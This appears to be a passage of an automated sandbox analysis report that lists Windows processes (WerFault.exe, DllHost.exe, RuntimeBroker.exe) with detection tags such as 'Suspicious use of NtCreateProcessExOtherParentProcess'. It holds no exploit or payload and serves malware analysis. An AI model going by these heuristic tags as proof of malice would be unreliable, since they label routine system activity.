C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 4040 -ip 40402⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 4948 -ip 49482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 384 -p 3148 -ip 31482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 4072 -ip 40722⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 4384 -ip 43842⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 620 -p 2612 -ip 26122⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 2908 -ip 29082⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 352 -ip 3522⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 3180 -ip 31802⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 580 -p 2040 -ip 20402⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 1100 -ip 11002⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 620 -p 2264 -ip 22642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 2916 -ip 29162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 536 -p 3940 -ip 39402⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 628 -p 656 -ip 6562⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 756 -ip 7562⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 1320 -ip 13202⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 4128 -ip 41282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 1348 -ip 13482⤵
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 3148 -ip 31482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 1232 -ip 12322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 628 -p 1560 -ip 15602⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 3896 -ip 38962⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 4224 -ip 42242⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 2256 -ip 22562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 5116 -ip 51162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 384 -p 4572 -ip 45722⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 2044 -ip 20442⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 628 -p 2776 -ip 27762⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 4200 -ip 42002⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 3948 -ip 39482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 1404 -ip 14042⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 4576 -ip 45762⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 1956 -ip 19562⤵
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 3892 -ip 38922⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 3552 -ip 35522⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 2572 -ip 25722⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4256 -s 6602⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3828 -s 3682⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1372 -s 4842⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3980 -s 3642⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4700 -s 4842⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1232 -s 4722⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4228 -s 4682⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3596 -s 5002⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4120 -s 4682⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4856 -s 6562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4948 -s 3882⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3372 -s 4802⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4944 -s 3842⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4716 -s 4922⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 636 -s 4921⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3408 -s 2282⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3028 -s 3841⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1708 -s 4282⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4480 -s 4802⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5012 -s 4001⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3652 -s 4201⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4780 -s 4241⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2588 -s 4002⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4564 -s 6521⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2276 -s 6562⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2264 -s 4001⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 772 -s 4002⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 432 -s 7922⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2016 -s 6802⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5116 -s 7641⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2632 -s 6482⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5004 -s 7882⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 224 -s 6562⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4792 -s 3881⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1528 -s 4202⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3520 -s 4882⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1036 -s 7922⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4580 -s 6642⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5116 -s 8121⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4868 -s 2442⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 848 -s 7721⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4824 -s 6482⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2872 -s 8002⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4208 -s 7802⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2044 -s 4961⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2460 -s 6642⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3700 -s 4842⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3060 -s 4762⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1784 -s 7722⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4812 -s 7202⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1956 -s 6881⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2640 -s 4762⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2968 -s 4922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4804 -s 6882⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5116 -s 5081⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5012 -s 4002⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2412 -s 7242⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3816 -s 4002⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2328 -s 7201⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4192 -s 4682⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4968 -s 7682⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4948 -s 6562⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4040 -s 4002⤵
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3148 -s 3882⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4072 -s 6801⤵
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2612 -s 6842⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4384 -s 4881⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2908 -s 4002⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 352 -s 6922⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3180 -s 4682⤵
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2040 -s 4922⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1100 -s 4922⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2264 -s 4922⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2916 -s 6642⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3940 -s 4722⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 756 -s 4122⤵
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 656 -s 6561⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
- Modifies registry class
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1320 -s 4202⤵
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4128 -s 4202⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1348 -s 4882⤵
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3148 -s 7882⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1232 -s 6802⤵
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1560 -s 7802⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3896 -s 4202⤵
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4224 -s 8162⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2256 -s 6802⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5116 -s 7242⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4572 -s 6802⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2044 -s 7722⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2776 -s 4522⤵
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4200 -s 7762⤵
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3948 -s 6562⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1404 -s 7242⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4576 -s 3842⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1956 -s 4762⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3892 -s 6842⤵
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3552 -s 7722⤵
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2572 -s 3882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Enumerates system info in registry
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
